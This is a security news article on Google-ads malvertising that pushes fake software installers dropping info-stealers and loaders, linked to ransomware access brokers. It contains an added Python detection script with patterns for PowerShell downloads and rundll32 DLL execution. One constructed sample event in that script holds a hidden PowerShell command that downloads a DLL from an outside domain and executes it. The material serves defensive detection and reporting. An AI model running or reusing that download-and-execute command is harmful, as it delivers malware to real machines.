Ransomware access brokers use Google ads to breach your network


A threat actor tracked as DEV-0569 uses Google Ads in widespread, ongoing advertising campaigns to distribute malware, steal victims’ passwords, and ultimately breach networks for ransomware attacks.

Over the past few weeks, cybersecurity researchers MalwareHunterTeam, Germán Fernández and Will Dormann have illustrated how Google search results have become a hotbed for malicious advertisements pushing malware.

These ads pretend to be websites for popular software programs, such as LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR, and VLC.

Google ads promoting fake software websites are pushing malware (Source: Researchers/BleepingComputer)

Clicking on the ads takes visitors to websites that appear as download portals or copies of the software’s legitimate websites, as shown below.

Fake Rufus download site (Source: BleepingComputer)

But when you click on the download links, you usually download an MSI file that installs different malware depending on the campaign.

The list of malware installed in these campaigns so far includes RedLine Stealer, Gozi/Ursniff, Vidar and potentially Cobalt Strike and ransomware.

While there appear to be many threat actors abusing the Google Ads platform to distribute malware, two particular campaigns stand out as their infrastructure was previously linked to ransomware attacks.

From Google ads to ransomware attacks

In February 2022, Mandiant discovered a malware distribution campaign that used SEO poisoning to rank websites pretending to be popular software in search results.

If a user installed the software offered from these sites, it would execute a new malware downloader called BatLoader, which launches a multi-step infection process that ultimately gives the threat actors initial access to the victims’ networks.

Later that year, Microsoft reported that the threat actors behind BatLoader, tracked as DEV-0569, had begun using Google ads to promote their malicious websites. Even worse, Microsoft said these infections ultimately led to the deployment of the Royal Ransomware on breached networks.

“Recent activity by the threat actor that Microsoft tracks as DEV-0569, known to distribute various payloads, has led to the deployment of Royal ransomware, which first appeared in September 2022 and is distributed by multiple threat actors,” Microsoft warned in their report.

Researchers believe that DEV-0569 is an initial access broker that uses its malware distribution system to breach corporate networks. They use this access in their own attacks or sell it to other malicious actors, such as the Royal ransomware gang.

Although Microsoft did not share many URLs related to these attacks, additional reports from The DFIR Report and eSentire added more information, including the following URL used in BatLoader’s campaigns:

ads-check[.]com (Used for tracking Google ads statistics)

Fast forward to January 21, 2023, when CronUp researcher Germán Fernández noted that recent Google ads promoting popular software led to malicious websites using infrastructure operated by the DEV-0569 threat actors.

While malicious installers in this campaign no longer use BatLoader like the previous campaigns seen by Microsoft, they install an information stealer (RedLine Stealer) and then a malware downloader (Gozi/Ursniff).

In the current campaign, RedLine is used to steal data, such as passwords, cookies and cryptocurrency wallets, while Gozi/Ursniff is used to download additional malware.

Germán told BleepingComputer that he linked these new campaigns to DEV-0569 because they used the same Bitbucket repository and the same ads-check[.]com web address seen in the reported November/December 2022 campaigns.

Germán did not wait long enough to see if Cobalt Strike and Royal Ransomware would be installed. However, he told BleepingComputer that he believed the hackers would eventually use the Gozi infection to drop Cobalt Strike, as BatLoader did in previous campaigns.

Germán also gained access to the web panel DEV-0569 uses to track its malware distribution campaign and shared screenshots on Twitter. These screenshots showed the legitimate programs that were impersonated and the numerous victims worldwide that were infected daily.

Another campaign linked to CLOP ransomware

To make matters worse, Germán discovered that a different but similar Google ad campaign used infrastructure previously used by a threat group tracked as TA505, which is known to distribute CLOP ransomware.

In this Google ad campaign, the threat actors distribute malware through websites pretending to be popular software, such as AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and oddly, websites for W-9 IRS forms.

Fake AnyDesk ad seen by Will Dormann (Source: Dormann)

A list of domains in this campaign tracked by CronUp is available on this GitHub page.

Once installed, the malware from this campaign runs a PowerShell script that downloads and executes a DLL from the website download-cdn[.]com, which TA505 previously used.

PowerShell script to download malware (Source: BleepingComputer)
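The chain described above (an installer launching PowerShell, which fetches a DLL from a watched domain and executes it) is something endpoint telemetry can surface. The following triage script is an added example, not code from the article or from any researcher it cites; the process-creation event shape, the sample events and the indicator list (refanged from the article, with the hyphen in download-cdn assumed) are all constructed here.

```python
"""Flag process-creation events matching the fake-installer -> PowerShell -> DLL chain."""
import re

# Indicators named in the article, refanged for matching (download-cdn hyphen is assumed).
WATCHED_DOMAINS = {"ads-check.com", "download-cdn.com"}

DOWNLOAD_PAT = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
DLL_EXEC_PAT = re.compile(r"\b(rundll32|regsvr32)(\.exe)?\b.*\.dll", re.I)
DOMAIN_PAT = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def score_event(event):
    """Return the list of reasons an event looks like the described chain (empty if none)."""
    reasons = []
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    is_ps = image.endswith(("powershell.exe", "pwsh.exe"))
    if is_ps and parent.endswith("msiexec.exe"):
        reasons.append("powershell spawned by an MSI installer")
    if is_ps and DOWNLOAD_PAT.search(cmd):
        reasons.append("powershell download primitive in command line")
    if DLL_EXEC_PAT.search(cmd):
        reasons.append("DLL execution via rundll32/regsvr32")
    for host in DOMAIN_PAT.findall(cmd):
        if host.lower() in WATCHED_DOMAINS:
            reasons.append("contact with watched domain " + host.lower())
    return reasons


def triage(events):
    """Return (event id, reasons) for every event that produced at least one reason."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits.append((event["Id"], reasons))
    return hits


# Constructed sample telemetry (Sysmon-like fields); not real captures.
SAMPLE_EVENTS = [
    {"Id": 1, "Image": r"C:\Windows\System32\msiexec.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\u\Downloads\rufus-setup.msi /qn"},
    {"Id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('https://download-cdn.com/a.dll','C:\ProgramData\a.dll'); rundll32 C:\ProgramData\a.dll,Start"},
    {"Id": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": r"powershell -c Get-ChildItem C:\Temp"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS):
        print(event_id, reasons)
```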

However, Proofpoint threat researcher Tommy Madjar told BleepingComputer that this domain had previously changed ownership and it is unclear whether TA505 is still using it.

Regardless of who owns these domains, the sheer number of malicious Google ads appearing in search results is becoming a massive problem for both consumers and businesses.

Because these campaigns are used to gain initial access to corporate networks, they can lead to various follow-on attacks such as data theft, ransomware and even destructive attacks that disrupt a company’s operations.

Although BleepingComputer did not contact Google regarding this article, we did contact them last week regarding a similar malware campaign distributed via Google ads.

Google told us at the time that the platform’s policies are designed and enforced to prevent brand impersonation.

“We have robust policies that prohibit ads that attempt to circumvent our enforcement by hiding the advertiser’s identity and impersonating other brands, and we enforce them vigorously. We have reviewed the ads in question and have removed them,” Google told BleepingComputer.

The good news is that Google has been removing ads as they are reported and discovered.

The bad news is that the threat actors are constantly launching new ad campaigns and new websites, making it a giant game of whack-a-mole, and it doesn’t feel like Google is winning.
